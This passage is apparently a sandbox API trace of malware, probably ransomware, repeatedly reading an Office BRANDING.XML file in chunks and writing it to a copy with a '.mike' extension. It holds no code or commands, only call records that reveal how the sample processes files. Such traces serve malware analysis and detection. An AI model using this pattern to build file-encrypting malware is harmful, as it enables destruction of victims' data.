returned 0x1 [0052.669] GetFileType (hFile=0x288) returned 0x1 [0052.669] ReadFile (in: hFile=0x288, lpBuffer=0x229dc58, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x229dc58*, lpNumberOfBytesRead=0x2af038*=0x2800, lpOverlapped=0x0) returned 1 [0052.670] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.670] GetFileType (hFile=0x288) returned 0x1 [0052.670] GetFileType (hFile=0x288) returned 0x1 [0052.670] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0xf220 [0052.670] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.670] GetFileType (hFile=0x288) returned 0x1 [0052.670] GetFileType (hFile=0x288) returned 0x1 [0052.670] ReadFile (in: hFile=0x288, lpBuffer=0x22aaca8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x22aaca8*, lpNumberOfBytesRead=0x2af038*=0x2800, lpOverlapped=0x0) returned 1 [0052.671] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.671] GetFileType (hFile=0x288) returned 0x1 [0052.671] GetFileType (hFile=0x288) returned 0x1 [0052.671] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x11a20 [0052.671] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.671] GetFileType (hFile=0x288) returned 0x1 [0052.671] GetFileType (hFile=0x288) returned 0x1 [0052.671] ReadFile (in: hFile=0x288, lpBuffer=0x22b7cf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x22b7cf8*, lpNumberOfBytesRead=0x2af038*=0x2800, lpOverlapped=0x0) returned 1 [0052.672] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.672] GetFileType (hFile=0x288) returned 0x1 [0052.672] GetFileType (hFile=0x288) returned 0x1 [0052.672] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x14220 [0052.672] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.672] GetFileType (hFile=0x288) returned 0x1 [0052.672] GetFileType (hFile=0x288) returned 0x1 [0052.673] ReadFile (in: hFile=0x288, lpBuffer=0x22c4d48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x22c4d48*, lpNumberOfBytesRead=0x2af038*=0x2800, lpOverlapped=0x0) returned 1 [0052.673] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.673] GetFileType (hFile=0x288) returned 0x1 [0052.673] GetFileType (hFile=0x288) returned 0x1 [0052.673] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x16a20 [0052.673] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.674] GetFileType (hFile=0x288) returned 0x1 [0052.674] GetFileType (hFile=0x288) returned 0x1 [0052.674] ReadFile (in: hFile=0x288, lpBuffer=0x22d1d98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x22d1d98*, lpNumberOfBytesRead=0x2af038*=0x2800, lpOverlapped=0x0) returned 1 [0052.674] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.674] GetFileType (hFile=0x288) returned 0x1 [0052.674] GetFileType (hFile=0x288) returned 0x1 [0052.674] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x19220 [0052.675] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.675] GetFileType (hFile=0x288) returned 0x1 [0052.675] GetFileType (hFile=0x288) returned 0x1 [0052.675] ReadFile (in: hFile=0x288, lpBuffer=0x22dede8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x22dede8*, lpNumberOfBytesRead=0x2af038*=0x2800, lpOverlapped=0x0) returned 1 [0052.675] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.675] GetFileType (hFile=0x288) returned 0x1 [0052.675] GetFileType (hFile=0x288) returned 0x1 [0052.675] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x1ba20 [0052.676] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.676] GetFileType (hFile=0x288) returned 0x1 [0052.676] GetFileType (hFile=0x288) returned 0x1 [0052.676] ReadFile (in: hFile=0x288, lpBuffer=0x22ebe38, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x22ebe38*, lpNumberOfBytesRead=0x2af038*=0x2800, lpOverlapped=0x0) returned 1 [0052.677] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.677] GetFileType (hFile=0x288) returned 0x1 [0052.677] GetFileType (hFile=0x288) returned 0x1 [0052.677] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x1e220 [0052.677] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.677] GetFileType (hFile=0x288) returned 0x1 [0052.677] GetFileType (hFile=0x288) returned 0x1 [0052.678] ReadFile (in: hFile=0x288, lpBuffer=0x22f8e88, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x22f8e88*, lpNumberOfBytesRead=0x2af038*=0x2800, lpOverlapped=0x0) returned 1 [0052.679] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.679] GetFileType (hFile=0x288) returned 0x1 [0052.679] GetFileType (hFile=0x288) returned 0x1 [0052.679] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x20a20 [0052.680] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.680] GetFileType (hFile=0x288) returned 0x1 [0052.680] GetFileType (hFile=0x288) returned 0x1 [0052.680] ReadFile (in: hFile=0x288, lpBuffer=0x2108958, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x2108958*, lpNumberOfBytesRead=0x2af038*=0x2800, lpOverlapped=0x0) returned 1 [0052.681] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.681] GetFileType (hFile=0x288) returned 0x1 [0052.681] GetFileType (hFile=0x288) returned 0x1 [0052.681] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x23220 [0052.681] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.681] GetFileType (hFile=0x288) returned 0x1 [0052.681] GetFileType (hFile=0x288) returned 0x1 [0052.681] ReadFile (in: hFile=0x288, lpBuffer=0x21159a8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x21159a8*, lpNumberOfBytesRead=0x2af038*=0x2800, lpOverlapped=0x0) returned 1 [0052.682] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.682] GetFileType (hFile=0x288) returned 0x1 [0052.682] GetFileType (hFile=0x288) returned 0x1 [0052.683] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x25a20 [0052.683] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.683] GetFileType (hFile=0x288) returned 0x1 [0052.683] GetFileType (hFile=0x288) returned 0x1 [0052.683] ReadFile (in: hFile=0x288, lpBuffer=0x21229f8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x21229f8*, lpNumberOfBytesRead=0x2af038*=0x2800, lpOverlapped=0x0) returned 1 [0052.684] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.684] GetFileType (hFile=0x288) returned 0x1 [0052.684] GetFileType (hFile=0x288) returned 0x1 [0052.684] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x28220 [0052.685] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.685] GetFileType (hFile=0x288) returned 0x1 [0052.685] GetFileType (hFile=0x288) returned 0x1 [0052.685] ReadFile (in: hFile=0x288, lpBuffer=0x212fa48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x212fa48*, lpNumberOfBytesRead=0x2af038*=0x2800, lpOverlapped=0x0) returned 1 [0052.686] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.686] GetFileType (hFile=0x288) returned 0x1 [0052.686] GetFileType (hFile=0x288) returned 0x1 [0052.686] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x2aa20 [0052.686] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.686] GetFileType (hFile=0x288) returned 0x1 [0052.686] GetFileType (hFile=0x288) returned 0x1 [0052.686] ReadFile (in: hFile=0x288, lpBuffer=0x213ca98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x213ca98*, lpNumberOfBytesRead=0x2af038*=0x2800, lpOverlapped=0x0) returned 1 [0052.687] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.687] GetFileType (hFile=0x288) returned 0x1 [0052.687] GetFileType (hFile=0x288) returned 0x1 [0052.687] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x2d220 [0052.688] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.688] GetFileType (hFile=0x288) returned 0x1 [0052.688] GetFileType (hFile=0x288) returned 0x1 [0052.688] ReadFile (in: hFile=0x288, lpBuffer=0x2149ae8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x2149ae8*, lpNumberOfBytesRead=0x2af038*=0x2800, lpOverlapped=0x0) returned 1 [0052.689] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.689] GetFileType (hFile=0x288) returned 0x1 [0052.689] GetFileType (hFile=0x288) returned 0x1 [0052.689] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x2fa20 [0052.689] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.690] GetFileType (hFile=0x288) returned 0x1 [0052.690] GetFileType (hFile=0x288) returned 0x1 [0052.690] ReadFile (in: hFile=0x288, lpBuffer=0x2156b38, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x2156b38*, lpNumberOfBytesRead=0x2af038*=0x2800, lpOverlapped=0x0) returned 1 [0052.691] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.691] GetFileType (hFile=0x288) returned 0x1 [0052.691] GetFileType (hFile=0x288) returned 0x1 [0052.691] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x32220 [0052.691] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.691] GetFileType (hFile=0x288) returned 0x1 [0052.691] GetFileType (hFile=0x288) returned 0x1 [0052.691] ReadFile (in: hFile=0x288, lpBuffer=0x2163b88, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x2163b88*, lpNumberOfBytesRead=0x2af038*=0x2800, lpOverlapped=0x0) returned 1 [0052.692] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.692] GetFileType (hFile=0x288) returned 0x1 [0052.692] GetFileType (hFile=0x288) returned 0x1 [0052.692] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x34a20 [0052.693] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.693] GetFileType (hFile=0x288) returned 0x1 [0052.693] GetFileType (hFile=0x288) returned 0x1 [0052.693] ReadFile (in: hFile=0x288, lpBuffer=0x2170bd8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x2170bd8*, lpNumberOfBytesRead=0x2af038*=0x2800, lpOverlapped=0x0) returned 1 [0052.694] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.694] GetFileType (hFile=0x288) returned 0x1 [0052.694] GetFileType (hFile=0x288) returned 0x1 [0052.694] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x37220 [0052.694] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.694] GetFileType (hFile=0x288) returned 0x1 [0052.695] GetFileType (hFile=0x288) returned 0x1 [0052.695] ReadFile (in: hFile=0x288, lpBuffer=0x217dc28, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x217dc28*, lpNumberOfBytesRead=0x2af038*=0x2800, lpOverlapped=0x0) returned 1 [0052.695] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.696] GetFileType (hFile=0x288) returned 0x1 [0052.696] GetFileType (hFile=0x288) returned 0x1 [0052.696] SetFilePointer (in: hFile=0x288, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aef80*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aef80*=0) returned 0x39a20 [0052.696] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x288 [0052.696] GetFileType (hFile=0x288) returned 0x1 [0052.696] GetFileType (hFile=0x288) returned 0x1 [0052.696] ReadFile (in: hFile=0x288, lpBuffer=0x218ac78, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af038, lpOverlapped=0x0 | out: lpBuffer=0x218ac78*, lpNumberOfBytesRead=0x2af038*=0x2800, lpOverlapped=0x0) returned 1 [0052.697] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml.mike"), 